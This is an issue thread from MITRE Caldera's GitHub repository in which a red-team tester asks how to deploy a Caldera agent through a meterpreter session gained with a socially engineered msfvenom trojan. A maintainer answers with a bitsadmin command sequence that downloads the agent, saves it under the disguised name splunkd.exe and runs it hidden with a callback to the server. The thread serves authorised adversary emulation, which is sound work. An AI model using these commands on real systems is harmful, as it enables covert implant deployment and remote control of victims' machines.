### ISSUE TITLE
Regarding the combination of caldera and metasploit

### ISSUE THREAD

**Issue by wyc7** [mitre/caldera#2129]
Hi, I am doing something interesting recently.I run caldera on kali linux, and the agent will run on win10. But I don't want to manually copy the command to generate the agent to the powershell of win10. I want to try to use a pre-compromise method combined with caldera to form a complete red team test.

Screenshot of the command to generate the agent:
![image](https://user-images.githubusercontent.com/48666541/115416371-50089d00-a22a-11eb-81a5-d088e658c3db.png)

Now I use msfvenom in Metasploit to generate a Trojan, and transplant the Trojan to win10 through social engineering methods. Users only need to click the Trojan, and kali linux will establish a meterpreter session to gain control of the win10 shell. But the shell is cmd, and the command to generate the agent is psh code. How do I run this psh code through the win10 shell in kali linux, so that the agent generated in win10 connects back to Caldera?Or do you have a better way to generate the agent without manually copying the psh code into the powershell of win10?

In addition, how to understand the psh code in the screenshot?
My first understanding: the agent executable file already exists in caldera, through this psh code to download the existing agent in caldera. 
My second understanding: this psh code is used to generate a agent and connect the agent back to Caldera. 
Or both of my understandings are incorrect.

Can you help me? Thanks in advance.

**Comment by clenk** [comment]
Hi @wyc7, here's what the psh instructions are doing:

1. define the download url based on server location.
2. set a couple headers on the download request (`platform: windows` and `file: sandcat.go`)
3. download the agent from server (the server will compile the agent based on options in those headers)
4. extract the filename from the headers in the response 
5. stop the agent if it's already running and remove it from disk
6. save the downloaded agent using the filename from the response headers
7. start the agent, giving it the server location, telling it to run as an agent in the `red` group, and as a hidden window

Outside of powershell, you could use `bitsadmin` to do something similar (minus items 4-6 from the list above):

```
set server=http://192.168.1.53:8888
set url=%server%/file/download
bitsadmin /create calderaAgent
bitsadmin /sethttpmethod calderaAgent POST
bitsadmin /setcustomheaders calderaAgent platform:windows file:sandcat.go
bitsadmin /addfile calderaAgent %url% C:\Users\Public\splunkd.exe
bitsadmin /resume calderaAgent
bitsadmin /complete calderaAgent
start /B C:\Users\Public\splunkd.exe -server %server% -group red
```

**Comment by wyc7** [comment]
Hi @clenk, I tried to use **bitsadmin** to generate agent on Windows10, but the following error occurred:
![image](https://user-images.githubusercontent.com/48666541/115962714-4004fc00-a54f-11eb-9a12-4e76e3622627.png).
Can caldera directly use the cmd command to download its agent?

Now, I changed my method through your notification. First, I ran the psh command in another win10 powershell, got the agent file--_splunkd.exe_, and stored splunkd.exe in kali Linux. In the future, once I get a Win10 shell through metasploit on kali, I can upload the stored splunkd.exe to this Win10, and run splunkd.exe on this Win10 through the shell command in kali.

In addition, through your explanation of the psh instruction, can I understand that the psh instruction passes the necessary parameters to caldera to download the agent file?

More importantly, is it possible to find the agent file directly on the caldera server instead of downloading it through instructions?

-

**Comment by clenk** [comment]
There isn't a URI to download the agent file directly, no. It requires making a POST request to `/file/download` with the `platform` and `file` headers set so the server knows which agent to compile and which operating system platform to compile for.

Another way to accomplish this would be to open `irb`, the interactive ruby shell, in your meterpreter session and enter Ruby instructions to make a POST request with those headers to download the file.

I don't believe cmd has a built-in way to set headers and make web requests which is why I recommended bitsadmin. I tested it with bitsadmin version 3.0 and it worked, so I'm not sure why you're getting an "Invalid command" for `/sethttpmethod`.

**Comment by wyc7** [comment]
Hi @clenk , I solved the problem about bitsadmin, because the iso version of Win10 is too low (about released in 2015), I downloaded the higher version of Win10, and there is no error when using bitsadmin.

In addition, since I am very new to Ruby, it is difficult for me to construct Ruby instructions to send POST requests to download agent files. Can you tell me more specifically how to enter Ruby instructions? Many thanks!

**Comment by clenk** [comment]
Glad you figured out the issue with bitsadmin, @wyc7! Unfortunately I am also not too familiar with Ruby, but some Googling or other web searching should point you in the right direction. Maybe modify the example from [here](https://coderwall.com/p/c-mu-a/http-posts-in-ruby)?

I'm going to close this issue now, but feel free to open other issues if you have more Caldera-specific questions and we'd be happy to help.
